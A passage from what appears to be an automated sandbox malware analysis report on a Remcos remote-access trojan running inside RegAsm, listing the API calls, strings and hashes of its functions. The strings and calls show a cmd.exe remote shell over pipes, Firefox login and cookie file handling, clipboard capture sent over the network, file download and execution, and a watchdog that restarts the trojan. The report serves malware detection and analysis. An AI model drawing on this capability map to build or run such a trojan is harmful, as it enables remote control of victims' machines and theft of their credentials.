                                                          • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                                          • Opcode Fuzzy Hash: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                                          • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                                          Function 0041BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 0041BAB8
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$ForegroundText
                                                          • String ID:
                                                          • API String ID: 29597999-0
                                                          • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                          • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                                          • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                          • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                                          Function 00414EE9 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                                                          • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                                            • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                            • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                            • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                            • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                            • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                            • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                            • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                            • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                          • String ID:
                                                          • API String ID: 1170566393-0
                                                          • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                          • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                                                          • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                          • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                                                          Function 004118B2 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                          • Instruction ID: 7a76c105a712203ac593d2e3a9180375903654e9edbd33c69f6c8f8a5c58a470
                                                          • Opcode Fuzzy Hash: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                          • Instruction Fuzzy Hash: 971123B27201019FD7149B18C890FA6B76AFF51721B59425AE202CB3B2DB30EC91C694
                                                          Function 00445AF3 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                                          • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
                                                          • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                                          • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC
                                                          Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                          • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                                          • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                          • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                                          Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Startup
                                                          • String ID:
                                                          • API String ID: 724789610-0
                                                          • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                          • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                                          • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                          • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                                          Function 004027A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Deallocatestd::_
                                                          • String ID:
                                                          • API String ID: 1323251999-0
                                                          • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                          • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                          • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                          • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                          Function 00411CA3 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                          • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                          • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                          • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06

                                                          Non-executed Functions

                                                          Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                                          • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                                          • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                                            • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                            • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                            • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                            • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                            • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                                          • DeleteFileA.KERNEL32(?), ref: 00408652
                                                            • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                                            • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                            • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                            • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                          • Sleep.KERNEL32(000007D0), ref: 004086F8
                                                          • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                                            • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                          • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                          • API String ID: 1067849700-181434739
                                                          • Opcode ID: 9c6684c4782dd6b38750199dcd552d21679c50fd0583f0d2d695d87543971fcb
                                                          • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                                          • Opcode Fuzzy Hash: 9c6684c4782dd6b38750199dcd552d21679c50fd0583f0d2d695d87543971fcb
                                                          • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                                          Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 004056E6
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • __Init_thread_footer.LIBCMT ref: 00405723
                                                          • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                                          • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                            • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                                          • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                                          • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                          • CloseHandle.KERNEL32 ref: 00405A23
                                                          • CloseHandle.KERNEL32 ref: 00405A2B
                                                          • CloseHandle.KERNEL32 ref: 00405A3D
                                                          • CloseHandle.KERNEL32 ref: 00405A45
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                          • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                          • API String ID: 2994406822-18413064
                                                          • Opcode ID: d822b09cf1c83d37968f1791560ca3d4abf36940af86ae54e3bb9bd7b62a3c98
                                                          • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                                          • Opcode Fuzzy Hash: d822b09cf1c83d37968f1791560ca3d4abf36940af86ae54e3bb9bd7b62a3c98
                                                          • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                                          Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32 ref: 00412106
                                                            • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                            • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                            • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                                          • CloseHandle.KERNEL32(00000000), ref: 00412155
                                                          • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                          • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                          • API String ID: 3018269243-13974260
                                                          • Opcode ID: 94cd0e690e29393e168c36f2201fa927646a70d566ab7c517b625d411d554f8e
                                                          • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                                          • Opcode Fuzzy Hash: 94cd0e690e29393e168c36f2201fa927646a70d566ab7c517b625d411d554f8e
                                                          • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                                          Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                                          • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                                          • FindClose.KERNEL32(00000000), ref: 0040BD12
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                          • API String ID: 1164774033-3681987949
                                                          • Opcode ID: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
                                                          • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                                          • Opcode Fuzzy Hash: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
                                                          • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                                          Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 004168C2
                                                          • EmptyClipboard.USER32 ref: 004168D0
                                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                                          • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                                          • CloseClipboard.USER32 ref: 00416955
                                                          • OpenClipboard.USER32 ref: 0041695C
                                                          • GetClipboardData.USER32(0000000D), ref: 0041696C
                                                          • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                          • CloseClipboard.USER32 ref: 00416984
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                          • String ID: !D@
                                                          • API String ID: 3520204547-604454484
                                                          • Opcode ID: 87d49a8bb6f540de46fc3d8776ee09c35eeed2095cf9406eee51325eb26e7f5f
                                                          • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                                          • Opcode Fuzzy Hash: 87d49a8bb6f540de46fc3d8776ee09c35eeed2095cf9406eee51325eb26e7f5f
                                                          • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                                          Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                                          • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                                          • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                                          • FindClose.KERNEL32(00000000), ref: 0040BED0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$Close$File$FirstNext
                                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                          • API String ID: 3527384056-432212279
                                                          • Opcode ID: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
                                                          • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                                          • Opcode Fuzzy Hash: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
                                                          • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                                          Function 004132D2 Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                                          • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                                          • CloseHandle.KERNEL32(?), ref: 00413465
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                          • String ID:
                                                          • API String ID: 297527592-0
                                                          • Opcode ID: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                          • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                                          • Opcode Fuzzy Hash: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                          • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                                          Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                                            • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                            • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                          • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
